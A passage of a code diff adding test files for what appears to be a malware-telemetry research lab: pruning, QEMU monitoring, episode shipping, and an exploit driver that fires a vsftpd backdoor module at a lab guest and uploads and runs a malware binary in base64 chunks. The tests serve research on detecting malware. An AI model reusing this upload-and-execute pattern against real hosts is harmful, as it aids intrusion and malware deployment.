assert row["cache_misses"] is None
assert row["cache_miss_rate"] is None
assert pytest.approx(row["ipc"], abs=1e-9) == 0.5
def test_run_loop_returns_zero_when_perf_missing(tmp_path: Path, monkeypatch) -> None:
monkeypatch.setattr(perf_qemu, "perf_available", lambda: False)
import threading
rows = perf_qemu.run_loop(
pid=1,
output_path=tmp_path / "telemetry-perf.jsonl",
t_mono_origin_ns=0,
interval_ms=100,
stop_event=threading.Event(),
)
assert rows == 0

309
tests/test_prune.py Normal file
View file

@ -0,0 +1,309 @@
"""Tests for cis490-prune. Builds synthetic episode tarballs (each
flagged with a specific quality issue) and confirms the classifier
catches them. Then exercises the index-walk + dry-run / archive /
delete actions on a temp tree so we don't touch real data."""
from __future__ import annotations
import io
import json
import shutil
import subprocess
import tarfile
from pathlib import Path
import pytest
# Skip the whole module if zstd isn't on PATH (the prune tool shells
# out for decompression, mirroring the shipper).
zstd_available = shutil.which("zstd") is not None
pytestmark = pytest.mark.skipif(not zstd_available, reason="needs system zstd")
import sys
ROOT = Path(__file__).resolve().parent.parent
sys.path.insert(0, str(ROOT / "tools"))
import prune_episodes as pe # noqa: E402
# ---------------------------------------------------------------------------
# tar+zstd builder
# ---------------------------------------------------------------------------
def _make_tar_zst(out_path: Path, files: dict[str, bytes]) -> None:
"""Build a {episode_id}/<file> layout, tar it, zstd it."""
raw_tar = io.BytesIO()
with tarfile.open(fileobj=raw_tar, mode="w") as t:
for name, data in files.items():
info = tarfile.TarInfo(name=name)
info.size = len(data)
t.addfile(info, io.BytesIO(data))
out_path.parent.mkdir(parents=True, exist_ok=True)
raw_tmp = out_path.with_suffix(".tar")
raw_tmp.write_bytes(raw_tar.getvalue())
try:
subprocess.check_call(
["zstd", "-q", "-19", "--stdout", str(raw_tmp)],
stdout=out_path.open("wb"),
)
finally:
raw_tmp.unlink(missing_ok=True)
def _meta(*, sample: dict | None = None, exploit: dict | None = None) -> bytes:
return json.dumps({
"episode_id": "01TEST",
"schema_version": 1,
"sample": sample,
"exploit": exploit,
"result": {"phases_observed": ["clean", "infected_running", "dormant"]},
}, sort_keys=True).encode()
def _events(rows: list[dict]) -> bytes:
return ("\n".join(json.dumps(r, sort_keys=True) for r in rows) + "\n").encode()
def _proc_rows(*, flat: bool, n: int = 80) -> bytes:
"""Synthesize /proc rows with either flat-CPU (no phase signal)
or sharply-spiking CPU (clear phase boundaries). The test labels
file pairs with these."""
out: list[dict] = []
for i in range(n):
t = i * 100_000_000
if flat:
jiff = 100 + i * 20 # uniform increment → flat CPU%
else:
# First third clean (low), middle infected (high), last third dormant (low).
jiff = (
100 + i * 20 if i < n // 3 or i >= 2 * n // 3
else 100 + i * 1000 # huge jump for "infected"
)
out.append({
"t_mono_ns": t,
"cpu_user_jiffies": jiff,
"cpu_sys_jiffies": 0,
"rss_bytes": 1024 * 1024,
})
return ("\n".join(json.dumps(r) for r in out) + "\n").encode()
def _labels(boundary_ns: list[int], names: list[str]) -> bytes:
rows = [
{"t_mono_ns": t, "phase": p, "prev": names[i - 1] if i else None}
for i, (t, p) in enumerate(zip(boundary_ns, names))
]
return ("\n".join(json.dumps(r) for r in rows) + "\n").encode()
# ---------------------------------------------------------------------------
# Per-reason classifier tests
# ---------------------------------------------------------------------------
def _make_episode(tmp_path: Path, **member_overrides) -> Path:
"""Default = a healthy episode with sample, exploit, workload events,
sharp CPU envelope. Overrides replace specific members."""
n = 60
end_ns = n * 100_000_000
members = {
"01TEST/meta.json": _meta(
sample={"name": "xmrig", "kind": "real", "family": "XMRig",
"category": "cryptominer", "profile": "cpu-saturate",
"sha256": "a" * 64},
exploit={"module_name": "vsftpd_234_backdoor", "module": "x"},
),
"01TEST/events.jsonl": _events([
{"event": "snapshot_load"},
{"event": "workload_setup"},
{"event": "workload_started", "phase": "infected_running"},
{"event": "workload_killed", "phase": "dormant",
"pre_kill_probe": {"yes": "2", "loadavg": "1.4"}},
{"event": "episode_end"},
]),
"01TEST/labels.jsonl": _labels(
[0, n // 3 * 100_000_000, 2 * n // 3 * 100_000_000],
["clean", "infected_running", "dormant"],
),
"01TEST/telemetry-proc.jsonl": _proc_rows(flat=False, n=n),
}
members.update(member_overrides)
out = tmp_path / "01TEST.tar.zst"
_make_tar_zst(out, members)
return out
def test_healthy_episode_has_no_reasons(tmp_path: Path) -> None:
tar = _make_episode(tmp_path)
q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
assert q.reasons == [], f"unexpected reasons: {q.reasons}"
assert q.sample_name == "xmrig"
assert q.module_name == "vsftpd_234_backdoor"
def test_no_sample_flag(tmp_path: Path) -> None:
tar = _make_episode(
tmp_path,
**{"01TEST/meta.json": _meta(sample=None, exploit=None)},
)
q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
assert "no-sample" in q.reasons
def test_no_workload_events_flag(tmp_path: Path) -> None:
tar = _make_episode(
tmp_path,
**{"01TEST/events.jsonl": _events([
{"event": "snapshot_load"},
{"event": "phase_transition", "to": "clean"},
{"event": "episode_end"},
])},
)
q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
assert "no-workload-events" in q.reasons
def test_workload_failed_flag(tmp_path: Path) -> None:
tar = _make_episode(
tmp_path,
**{"01TEST/events.jsonl": _events([
{"event": "workload_setup"},
{"event": "workload_failed", "phase": "infected_running",
"error": "EOF on serial"},
{"event": "episode_end"},
])},
)
q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
assert "workload-failed" in q.reasons
def test_workload_silent_flag(tmp_path: Path) -> None:
"""The elliott-lab fingerprint: dormant probe shows yes=0,
meaning the workload never actually fired."""
tar = _make_episode(
tmp_path,
**{"01TEST/events.jsonl": _events([
{"event": "workload_setup"},
{"event": "workload_started", "phase": "infected_running"},
{"event": "workload_killed", "phase": "dormant",
"pre_kill_probe": {"yes": "0", "loadavg": "0.18"}},
])},
)
q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
assert "workload-silent" in q.reasons
def test_flat_cpu_flag(tmp_path: Path) -> None:
"""When the proc CPU% spread between phases is < 5pp, the episode
has no signal for the trainer to learn from."""
tar = _make_episode(
tmp_path,
**{"01TEST/telemetry-proc.jsonl": _proc_rows(flat=True, n=60)},
)
q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
assert "flat-cpu" in q.reasons
# ---------------------------------------------------------------------------
# Walk + actions
# ---------------------------------------------------------------------------
def _stage_receiver_tree(tmp_path: Path) -> tuple[Path, Path]:
"""Build a fake /var/lib/cis490 layout with two episodes: one
healthy, one flagged for no-sample. Returns (episodes_root, index_path)."""
episodes = tmp_path / "episodes"
(episodes / "lab1").mkdir(parents=True)
healthy = _make_episode(episodes / "lab1" / "01OK")
healthy.rename(episodes / "lab1" / "01OK.tar.zst")
bad = _make_episode(
episodes / "lab1" / "01FAKE",
**{"01TEST/meta.json": _meta(sample=None)},
)
bad.rename(episodes / "lab1" / "01FAKE.tar.zst")
index = tmp_path / "index.jsonl"
rows = [
{"host_id": "lab1", "episode_id": "01OK"},
{"host_id": "lab1", "episode_id": "01FAKE"},
]
index.write_text("\n".join(json.dumps(r) for r in rows) + "\n")
return episodes, index
def test_dry_run_does_not_modify_anything(tmp_path: Path, capsys) -> None:
episodes, index = _stage_receiver_tree(tmp_path)
rc = pe.main([
"--episodes-root", str(episodes),
"--index", str(index),
"--reason", "no-sample",
])
# Returns 1 because flagged episodes exist (matches CLI exit semantics).
assert rc == 1
# Both tarballs still on disk.
assert (episodes / "lab1" / "01OK.tar.zst").exists()
assert (episodes / "lab1" / "01FAKE.tar.zst").exists()
# Index unchanged.
assert len(index.read_text().splitlines()) == 2
def test_archive_moves_flagged_and_rewrites_index(tmp_path: Path) -> None:
episodes, index = _stage_receiver_tree(tmp_path)
archive = tmp_path / "archive"
rc = pe.main([
"--episodes-root", str(episodes),
"--index", str(index),
"--archive-root", str(archive),
"--reason", "no-sample",
"--archive",
])
assert rc == 1
# 01OK kept.
assert (episodes / "lab1" / "01OK.tar.zst").exists()
# 01FAKE moved.
assert not (episodes / "lab1" / "01FAKE.tar.zst").exists()
assert (archive / "lab1" / "01FAKE.tar.zst").exists()
# Index dropped the bad row.
rows = [json.loads(l) for l in index.read_text().splitlines() if l.strip()]
assert len(rows) == 1
assert rows[0]["episode_id"] == "01OK"
def test_delete_removes_flagged_and_rewrites_index(tmp_path: Path) -> None:
episodes, index = _stage_receiver_tree(tmp_path)
rc = pe.main([
"--episodes-root", str(episodes),
"--index", str(index),
"--reason", "no-sample",
"--delete",
])
assert rc == 1
assert not (episodes / "lab1" / "01FAKE.tar.zst").exists()
rows = [json.loads(l) for l in index.read_text().splitlines() if l.strip()]
assert len(rows) == 1
def test_host_filter_scopes_to_one_lab_host(tmp_path: Path) -> None:
episodes, index = _stage_receiver_tree(tmp_path)
rc = pe.main([
"--episodes-root", str(episodes),
"--index", str(index),
"--reason", "no-sample",
"--host", "lab2", # nothing matches
])
assert rc == 0 # zero flagged → exit 0
assert (episodes / "lab1" / "01FAKE.tar.zst").exists()
def test_multiple_reasons_combine(tmp_path: Path) -> None:
"""An episode failing >1 signal is flagged once, all reasons listed."""
tar = _make_episode(
tmp_path,
**{"01TEST/meta.json": _meta(sample=None),
"01TEST/events.jsonl": _events([{"event": "snapshot_load"}])},
)
q = pe.classify_episode(tar, host_id="x", episode_id="01TEST")
assert "no-sample" in q.reasons
assert "no-workload-events" in q.reasons
assert q.fake

333
tests/test_qmp.py Normal file
View file

@ -0,0 +1,333 @@
"""Tests for the QMP collector against an in-process fake QMP server.
The fake speaks just enough QMP to exercise:
- the greeting + qmp_capabilities handshake
- query-status
- query-blockstats
- query-stats target=vm
- error responses
- async events interleaved with command responses
"""
from __future__ import annotations
import json
import socket
import tempfile
import threading
import time
from pathlib import Path
from typing import Any
import pytest
from collectors import qmp
# ---------------------------------------------------------------------------
# Fake QMP server
# ---------------------------------------------------------------------------
class FakeQMPServer(threading.Thread):
"""Single-connection fake. Each line received from the client is
parsed as JSON; we look up ``execute`` in ``responses`` and emit
the configured reply. Optionally interleaves an async event before
the response."""
def __init__(
self,
socket_path: Path,
*,
responses: dict[str, Any] | None = None,
emit_event_before: set[str] | None = None,
) -> None:
super().__init__(daemon=True)
self.socket_path = socket_path
self.responses = responses or {}
self.emit_event_before = emit_event_before or set()
self.received: list[dict] = []
self._stop = threading.Event()
self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self._sock.bind(str(socket_path))
self._sock.listen(1)
self._sock.settimeout(5.0)
def run(self) -> None:
try:
conn, _ = self._sock.accept()
except socket.timeout:
return
conn.settimeout(5.0)
try:
# Greeting
conn.sendall(b'{"QMP": {"version": {"qemu": {"major":9,"minor":0,"micro":0}}, "capabilities": []}}\n')
buf = b""
while not self._stop.is_set():
try:
chunk = conn.recv(4096)
except socket.timeout:
if self._stop.is_set():
return
continue
if not chunk:
return
buf += chunk
while b"\n" in buf:
line, _, buf = buf.partition(b"\n")
if not line.strip():
continue
msg = json.loads(line)
self.received.append(msg)
cmd = msg.get("execute")
if cmd == "qmp_capabilities":
conn.sendall(b'{"return": {}}\n')
continue
if cmd in self.emit_event_before:
conn.sendall(b'{"event": "STOP", "timestamp": {"seconds": 1, "microseconds": 0}}\n')
if cmd in self.responses:
resp = self.responses[cmd]
conn.sendall((json.dumps(resp) + "\n").encode())
else:
conn.sendall(b'{"error": {"class": "CommandNotFound", "desc": "unknown"}}\n')
finally:
conn.close()
def shutdown(self) -> None:
self._stop.set()
try:
self._sock.close()
except OSError:
pass
@pytest.fixture
def qmp_server(tmp_path: Path):
sock_path = tmp_path / "qmp.sock"
return sock_path
# ---------------------------------------------------------------------------
# Client tests
# ---------------------------------------------------------------------------
def test_connect_negotiates_capabilities(qmp_server: Path) -> None:
server = FakeQMPServer(qmp_server)
server.start()
try:
client = qmp.QMPClient(qmp_server)
greeting = client.connect()
assert "version" in greeting
finally:
client.close()
server.shutdown()
# Server saw exactly the qmp_capabilities call.
assert any(m.get("execute") == "qmp_capabilities" for m in server.received)
def test_execute_returns_payload(qmp_server: Path) -> None:
server = FakeQMPServer(
qmp_server,
responses={
"query-status": {"return": {"status": "running", "running": True}},
},
)
server.start()
try:
client = qmp.QMPClient(qmp_server)
client.connect()
out = client.execute("query-status")
assert out == {"status": "running", "running": True}
finally:
client.close()
server.shutdown()
def test_execute_skips_async_events_before_response(qmp_server: Path) -> None:
server = FakeQMPServer(
qmp_server,
responses={
"query-status": {"return": {"status": "running", "running": True}},
},
emit_event_before={"query-status"},
)
server.start()
try:
client = qmp.QMPClient(qmp_server)
client.connect()
out = client.execute("query-status")
assert out["running"] is True
finally:
client.close()
server.shutdown()
def test_execute_raises_on_qmp_error(qmp_server: Path) -> None:
server = FakeQMPServer(qmp_server) # no responses → server sends error
server.start()
try:
client = qmp.QMPClient(qmp_server)
client.connect()
with pytest.raises(qmp.QMPError):
client.execute("totally-fake-command")
finally:
client.close()
server.shutdown()
# ---------------------------------------------------------------------------
# Row builder tests
# ---------------------------------------------------------------------------
def test_collect_once_assembles_full_row(qmp_server: Path) -> None:
server = FakeQMPServer(
qmp_server,
responses={
"query-status": {"return": {"status": "running", "running": True}},
"query-blockstats": {"return": [{
"device": "virtio0",
"stats": {
"rd_operations": 12, "wr_operations": 4,
"rd_bytes": 49152, "wr_bytes": 16384,
"flush_operations": 1,
},
}]},
"query-stats": {"return": [{"stats": [
{"name": "halt_exits", "value": 17000},
{"name": "io_exits", "value": 942},
{"name": "string-skipped", "value": "not-an-int"},
]}]},
},
)
server.start()
try:
client = qmp.QMPClient(qmp_server)
client.connect()
row = qmp.collect_once(client, t_mono_origin_ns=time.monotonic_ns())
finally:
client.close()
server.shutdown()
assert row["source"] == "host_qmp"
assert row["available_in_deployment"] is False
assert row["vm_running"] is True
assert row["blockstats"]["virtio0"]["rd_bytes"] == 49152
assert row["blockstats"]["virtio0"]["flush_ops"] == 1
assert row["kvm_stats"]["halt_exits"] == 17000
assert "string-skipped" not in row["kvm_stats"]
def test_collect_once_tolerates_missing_query_stats(qmp_server: Path) -> None:
server = FakeQMPServer(
qmp_server,
responses={
"query-status": {"return": {"status": "running", "running": True}},
"query-blockstats": {"return": []},
# query-stats deliberately absent → server returns CommandNotFound
},
)
server.start()
try:
client = qmp.QMPClient(qmp_server)
client.connect()
row = qmp.collect_once(client, t_mono_origin_ns=time.monotonic_ns())
finally:
client.close()
server.shutdown()
# Older qemu without query-stats: row still exists, kvm_stats absent.
assert "kvm_stats" not in row
assert row["vm_running"] is True
assert row["blockstats"] == {}
# ---------------------------------------------------------------------------
# run_loop tests
# ---------------------------------------------------------------------------
def test_run_loop_writes_rows_and_stops_cleanly(qmp_server: Path, tmp_path: Path) -> None:
server = FakeQMPServer(
qmp_server,
responses={
"query-status": {"return": {"status": "running", "running": True}},
"query-blockstats": {"return": []},
"query-stats": {"error": {"class": "CommandNotFound", "desc": "n/a"}},
},
)
server.start()
out_path = tmp_path / "telemetry-qmp.jsonl"
stop = threading.Event()
def stop_after(ms: int) -> None:
time.sleep(ms / 1000.0)
stop.set()
threading.Thread(target=stop_after, args=(350,), daemon=True).start()
rows = qmp.run_loop(
socket_path=qmp_server,
output_path=out_path,
t_mono_origin_ns=time.monotonic_ns(),
interval_ms=100,
stop_event=stop,
)
server.shutdown()
assert rows >= 2, f"expected >=2 rows, got {rows}"
lines = [json.loads(l) for l in out_path.read_text().splitlines()]
assert len(lines) == rows
for r in lines:
assert r["source"] == "host_qmp"
assert r["vm_running"] is True
def test_savevm_and_loadvm_via_human_monitor(qmp_server: Path) -> None:
server = FakeQMPServer(
qmp_server,
responses={
"human-monitor-command": {"return": ""},
},
)
server.start()
try:
client = qmp.QMPClient(qmp_server)
client.connect()
out_save = client.savevm("baseline")
out_load = client.loadvm("baseline")
assert out_save == ""
assert out_load == ""
finally:
client.close()
server.shutdown()
# Both calls go out as human-monitor-command with the right cmdline.
hmcs = [m for m in server.received if m.get("execute") == "human-monitor-command"]
cmds = [m["arguments"]["command-line"] for m in hmcs]
assert "savevm baseline" in cmds
assert "loadvm baseline" in cmds
def test_loadvm_surface_error(qmp_server: Path) -> None:
server = FakeQMPServer(qmp_server) # no responses → error reply
server.start()
try:
client = qmp.QMPClient(qmp_server)
client.connect()
with pytest.raises(qmp.QMPError):
client.loadvm("does-not-exist")
finally:
client.close()
server.shutdown()
def test_run_loop_returns_zero_when_socket_missing(tmp_path: Path) -> None:
# No server bound to the socket path.
rows = qmp.run_loop(
socket_path=tmp_path / "nonexistent.sock",
output_path=tmp_path / "telemetry-qmp.jsonl",
t_mono_origin_ns=time.monotonic_ns(),
interval_ms=100,
stop_event=threading.Event(),
)
assert rows == 0

327
tests/test_shipper.py Normal file
View file

@ -0,0 +1,327 @@
"""End-to-end shipper tests.
These run a real Uvicorn server bound to 127.0.0.1 on a free port,
hosting the actual receiver Starlette app over an EpisodeStore on a
temp dir. The shipper then talks to that server with its real
`httpx.Client` same code path as production. This catches things
the receiver-side ASGI tests can't (HTTP framing, header handling,
sync httpx behaviour, content-length quirks).
"""
from __future__ import annotations
import json
import socket
import threading
import time
from pathlib import Path
import httpx
import pytest
import uvicorn
from receiver.app import make_app
from receiver.store import EpisodeStore
from shipper.config import ReceiverEndpoint, ShipperConfig
from shipper.queue import ShipperQueue
from shipper.transport import ShipperTransport
# ---------------------------------------------------------------------------
# Live-receiver fixture
# ---------------------------------------------------------------------------
def _free_port() -> int:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind(("127.0.0.1", 0))
return s.getsockname()[1]
class _ServerThread(threading.Thread):
def __init__(self, app, port: int) -> None:
super().__init__(daemon=True)
cfg = uvicorn.Config(
app,
host="127.0.0.1",
port=port,
log_level="error",
lifespan="off",
access_log=False,
)
self.server = uvicorn.Server(cfg)
def run(self) -> None:
self.server.run()
def stop(self) -> None:
self.server.should_exit = True
def _wait_for_port(port: int, timeout_s: float = 5.0) -> None:
deadline = time.monotonic() + timeout_s
while time.monotonic() < deadline:
try:
with httpx.Client(timeout=0.5) as c:
r = c.get(f"http://127.0.0.1:{port}/v1/health")
if r.status_code == 200:
return
except httpx.HTTPError:
pass
time.sleep(0.05)
raise TimeoutError(f"receiver on 127.0.0.1:{port} did not come up")
@pytest.fixture
def store(tmp_path: Path) -> EpisodeStore:
return EpisodeStore(
store_root=tmp_path / "rcv-episodes",
incoming_root=tmp_path / "rcv-incoming",
index_path=tmp_path / "rcv-index.jsonl",
)
@pytest.fixture
def receiver(store: EpisodeStore):
app = make_app(store=store, max_episode_bytes=10_000_000, bearer_token=None)
port = _free_port()
server = _ServerThread(app, port)
server.start()
try:
_wait_for_port(port)
yield f"http://127.0.0.1:{port}", store
finally:
server.stop()
server.join(timeout=2)
@pytest.fixture
def receiver_with_bearer(store: EpisodeStore):
app = make_app(store=store, max_episode_bytes=10_000_000, bearer_token="s3cret")
port = _free_port()
server = _ServerThread(app, port)
server.start()
try:
_wait_for_port(port)
yield f"http://127.0.0.1:{port}", store
finally:
server.stop()
server.join(timeout=2)
def _make_shipper(
tmp_path: Path,
receiver_url: str,
*,
host_id: str = "lab1",
bearer: str | None = None,
) -> tuple[ShipperConfig, ShipperTransport, ShipperQueue]:
data_root = tmp_path / "lab-data"
cfg = ShipperConfig(
host_id=host_id,
data_root=data_root,
receiver=ReceiverEndpoint(url=receiver_url, bearer_token=bearer),
scan_interval_s=0.05,
)
transport = ShipperTransport(cfg)
queue = ShipperQueue(cfg, transport)
return cfg, transport, queue
def _make_episode(cfg: ShipperConfig, episode_id: str, *, content: bytes = b"data") -> Path:
ep = cfg.episodes_dir / episode_id
ep.mkdir(parents=True, exist_ok=True)
(ep / "meta.json").write_bytes(content)
(ep / "events.jsonl").write_text("{}\n")
(ep / "labels.jsonl").write_text("{}\n")
(ep / "telemetry-proc.jsonl").write_text("{}\n")
(ep / "done.marker").touch()
return ep
# ---------------------------------------------------------------------------
# Ping
# ---------------------------------------------------------------------------
def test_ping_returns_ok_against_running_receiver(tmp_path: Path, receiver) -> None:
url, _ = receiver
_, transport, _ = _make_shipper(tmp_path, url)
res = transport.ping()
assert res.ok is True
assert res.status_code == 200
assert res.body is not None
assert res.body["ok"] is True
assert res.body["host_id"] == "lab1"
assert res.body["schema_version"] == 1
def test_ping_writes_nothing_to_index(tmp_path: Path, receiver) -> None:
url, store = receiver
_, transport, _ = _make_shipper(tmp_path, url)
transport.ping()
transport.ping()
transport.ping()
assert store.index_path.read_text() == ""
def test_ping_fails_with_wrong_bearer(tmp_path: Path, receiver_with_bearer) -> None:
url, _ = receiver_with_bearer
_, transport, _ = _make_shipper(tmp_path, url, bearer="WRONG")
res = transport.ping()
assert res.ok is False
assert res.status_code == 401
def test_ping_succeeds_with_right_bearer(tmp_path: Path, receiver_with_bearer) -> None:
url, _ = receiver_with_bearer
_, transport, _ = _make_shipper(tmp_path, url, bearer="s3cret")
res = transport.ping()
assert res.ok is True
assert res.status_code == 200
def test_ping_fails_when_receiver_unreachable(tmp_path: Path) -> None:
# Pick a free port and don't bind it — connect must fail.
port = _free_port()
_, transport, _ = _make_shipper(tmp_path, f"http://127.0.0.1:{port}")
res = transport.ping()
assert res.ok is False
assert res.status_code == 0
assert res.error is not None
# ---------------------------------------------------------------------------
# Tar + ship
# ---------------------------------------------------------------------------
def test_run_once_ships_one_done_episode(tmp_path: Path, receiver) -> None:
url, store = receiver
cfg, _, queue = _make_shipper(tmp_path, url)
_make_episode(cfg, "01EPISODE")
result = queue.run_once()
assert result.scanned == 1
assert result.shipped == 1
assert result.transient_failures == 0
# Episode dir moved to shipped/.
assert not (cfg.episodes_dir / "01EPISODE").exists()
assert (cfg.shipped_dir / "01EPISODE").exists()
# Outbox tarball cleaned up.
assert list(cfg.outbox_dir.iterdir()) == []
# Receiver stored it and indexed it.
assert store.final_path("lab1", "01EPISODE").exists()
rows = [json.loads(l) for l in store.index_path.read_text().splitlines()]
assert len(rows) == 1
assert rows[0]["host_id"] == "lab1"
assert rows[0]["episode_id"] == "01EPISODE"
def test_run_once_skips_episodes_without_done_marker(tmp_path: Path, receiver) -> None:
url, store = receiver
cfg, _, queue = _make_shipper(tmp_path, url)
ep = cfg.episodes_dir / "01PARTIAL"
ep.mkdir(parents=True)
(ep / "meta.json").write_text("{}")
# Note: NO done.marker.
result = queue.run_once()
assert result.scanned == 0
assert result.shipped == 0
assert ep.exists() # untouched
assert store.index_path.read_text() == ""
def test_run_once_idempotent_re_ship_returns_already_present(tmp_path: Path, receiver) -> None:
"""If a prior run shipped an episode but crashed before retiring it,
the next run must re-ship the same bytes successfully (200) and
retire the dir, not flag it as a conflict."""
url, store = receiver
cfg, _, queue = _make_shipper(tmp_path, url)
_make_episode(cfg, "01REPLAY", content=b"same-bytes")
queue.run_once()
assert (cfg.shipped_dir / "01REPLAY").exists()
# Simulate a crash: move it back as if retire never happened.
(cfg.shipped_dir / "01REPLAY").rename(cfg.episodes_dir / "01REPLAY")
result = queue.run_once()
assert result.scanned == 1
assert result.shipped == 1
assert (cfg.shipped_dir / "01REPLAY").exists()
# Index didn't double up.
rows = store.index_path.read_text().splitlines()
assert len(rows) == 1
def test_run_once_handles_409_conflict(tmp_path: Path, receiver) -> None:
"""If the same episode_id was previously shipped with *different*
bytes, the receiver returns 409 and the shipper must NOT retire
the local dir operator triage required."""
url, _ = receiver
cfg, _, queue = _make_shipper(tmp_path, url)
_make_episode(cfg, "01CONFLICT", content=b"first")
result = queue.run_once()
assert result.shipped == 1
# Simulate a re-do with different content but the same id (e.g., a
# botched re-run on the lab host).
(cfg.shipped_dir / "01CONFLICT").rename(cfg.episodes_dir / "01CONFLICT")
(cfg.episodes_dir / "01CONFLICT" / "meta.json").write_bytes(b"tampered")
result = queue.run_once()
assert result.scanned == 1
assert result.shipped == 0
assert result.conflicts == 1
# Local dir survives — operator can decide what to do.
assert (cfg.episodes_dir / "01CONFLICT").exists()
def test_run_once_handles_transient_when_receiver_is_down(tmp_path: Path) -> None:
port = _free_port()
cfg, _, queue = _make_shipper(tmp_path, f"http://127.0.0.1:{port}")
_make_episode(cfg, "01DOWN")
result = queue.run_once()
assert result.scanned == 1
assert result.shipped == 0
assert result.transient_failures == 1
# Episode dir + tarball both stay in place for the next pass.
assert (cfg.episodes_dir / "01DOWN").exists()
assert (cfg.outbox_dir / "01DOWN.tar.zst").exists()
def test_tarball_round_trips_episode_dir(tmp_path: Path, receiver) -> None:
"""The receiver-side tarball must extract back to the original
episode dir layout (modulo file order). Verifies the tar+zstd
pipe is intact."""
import subprocess
import tarfile
url, _ = receiver
cfg, _, queue = _make_shipper(tmp_path, url)
ep = _make_episode(cfg, "01ROUND", content=b"meta-bytes")
expected_files = sorted(p.name for p in ep.iterdir())
queue.run_once()
# The receiver stored it; pull the bytes back, decompress + untar.
rcv_path = next((tmp_path / "rcv-episodes" / "lab1").glob("01ROUND.tar.zst"))
decompressed = tmp_path / "01ROUND.tar"
subprocess.check_call(
["zstd", "-q", "-d", "-o", str(decompressed), str(rcv_path)],
)
extract_dir = tmp_path / "extracted"
extract_dir.mkdir()
with tarfile.open(decompressed) as tf:
tf.extractall(extract_dir)
got_files = sorted(p.name for p in (extract_dir / "01ROUND").iterdir())
assert got_files == expected_files

258
tests/test_tier4.py Normal file
View file

@ -0,0 +1,258 @@
"""Tests for the Tier-4 path:
- real_binary_workload constructs valid shell commands
- Sample.binary_path resolves correctly
- MSFExploitDriver.real-sample dispatch picks the upload+exec path
when a binary is staged, mimic when it isn't
- tools/fetch_sample input validation (we don't hit the live API)
"""
from __future__ import annotations
import hashlib
from pathlib import Path
import pytest
from exploits.driver import DriverConfig, MSFExploitDriver
from exploits.modules import load_module_config
from exploits.workloads import (
chunked_real_binary_upload, real_binary_workload,
)
from samples.manifest import Sample
REPO_ROOT = Path(__file__).resolve().parent.parent
MODULES_DIR = REPO_ROOT / "exploits" / "modules"
# Reuse the FakeMSFRpcClient from test_exploits.py.
from tests.test_exploits import FakeMSFRpcClient # noqa: E402
# ---------------------------------------------------------------------------
# real_binary_workload
# ---------------------------------------------------------------------------
def test_real_binary_workload_embeds_base64() -> None:
payload = b"\x7fELF" + b"\x00" * 64 # tiny ELF-shaped header
w = real_binary_workload(payload)
# Start command bundles a chunked upload (printf '%s' '<b64>' >> file).
# Pull all b64 segments out and confirm they round-trip.
import base64 as _b64
import re
matches = re.findall(r"printf '%s' '([A-Za-z0-9+/=]+)'", w.start_cmd)
assert matches, "expected printf-based b64 chunks in start_cmd"
decoded = _b64.b64decode("".join(matches))
assert decoded == payload
def test_chunked_real_binary_upload_splits_correctly() -> None:
"""A binary larger than the chunk size should produce >1 chunks
plus a finalize + exec. Each chunk's payload must be individually
valid base64 and the concatenation must round-trip."""
import base64 as _b64
import hashlib as _hashlib
import re
# Build a payload large enough to force multiple chunks.
payload = (b"\x90\xab" * 8000)
plan = chunked_real_binary_upload(payload)
assert plan.n_chunks >= 3 # 1 init + 2+ data chunks
assert plan.expected_sha256 == _hashlib.sha256(payload).hexdigest()
# Reconstruct from chunks.
segs = []
for c in plan.chunks:
m = re.search(r"printf '%s' '([A-Za-z0-9+/=]+)'", c)
if m:
segs.append(m.group(1))
assert segs, "no data chunks parsed"
decoded = _b64.b64decode("".join(segs))
assert decoded == payload
# finalize_cmd verifies the sha256 we computed.
assert plan.expected_sha256 in plan.finalize_cmd
assert "sha256sum" in plan.finalize_cmd
def test_real_binary_workload_stop_kills_pidfile() -> None:
w = real_binary_workload(b"x" * 16)
assert "kill" in w.stop_cmd
assert ".cis490-real" in w.stop_cmd
def test_real_binary_workload_per_profile_isolation() -> None:
a = real_binary_workload(b"\x00", sample=Sample(name="a", family="A", category="rat", profile="cpu-saturate"))
b = real_binary_workload(b"\x00", sample=Sample(name="b", family="B", category="rat", profile="bursty-c2"))
# Different profiles → different /tmp paths so concurrent samples
# don't stomp each other in the same guest.
assert a.profile != b.profile
assert a.start_cmd != b.start_cmd
# ---------------------------------------------------------------------------
# Sample.binary_path
# ---------------------------------------------------------------------------
def test_binary_path_resolves_when_staged(tmp_path: Path) -> None:
sha = "a" * 64
(tmp_path / sha).write_bytes(b"hello")
s = Sample(name="x", family="X", category="rat", profile="cpu-saturate", sha256=sha)
assert s.binary_path(tmp_path) == tmp_path / sha
def test_binary_path_none_when_missing(tmp_path: Path) -> None:
s = Sample(name="x", family="X", category="rat", profile="cpu-saturate", sha256="b" * 64)
assert s.binary_path(tmp_path) is None
def test_binary_path_none_for_mimic_sample(tmp_path: Path) -> None:
s = Sample(name="x", family="X", category="rat", profile="cpu-saturate")
assert s.binary_path(tmp_path) is None
# ---------------------------------------------------------------------------
# Driver dispatch
# ---------------------------------------------------------------------------
def test_driver_picks_real_binary_when_staged(tmp_path: Path) -> None:
payload = b"\x7fELF\x02" + b"\x00" * 60
sha = hashlib.sha256(payload).hexdigest()
(tmp_path / sha).write_bytes(payload)
sample = Sample(
name="real-x", family="X", category="rat",
profile="cpu-saturate", sha256=sha,
)
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
driver = MSFExploitDriver(
client=client, # type: ignore[arg-type]
module=cfg,
cfg=DriverConfig(
target_ip="10.200.0.10",
session_open_timeout_s=0.5,
sample_store_root=tmp_path,
),
emit_event=lambda *a, **kw: None,
sample=sample,
)
# Driver picks the chunked-upload path.
assert driver.workload is not None
assert driver.workload.profile.startswith("real:")
assert driver._chunked is not None
assert driver._chunked.expected_sha256 == sha
def test_driver_walks_chunked_upload_in_session(tmp_path: Path) -> None:
"""End-to-end: at infected_running, the driver should issue every
chunk + finalize + exec as separate shell_write calls. The fake
client records them in order so we can verify."""
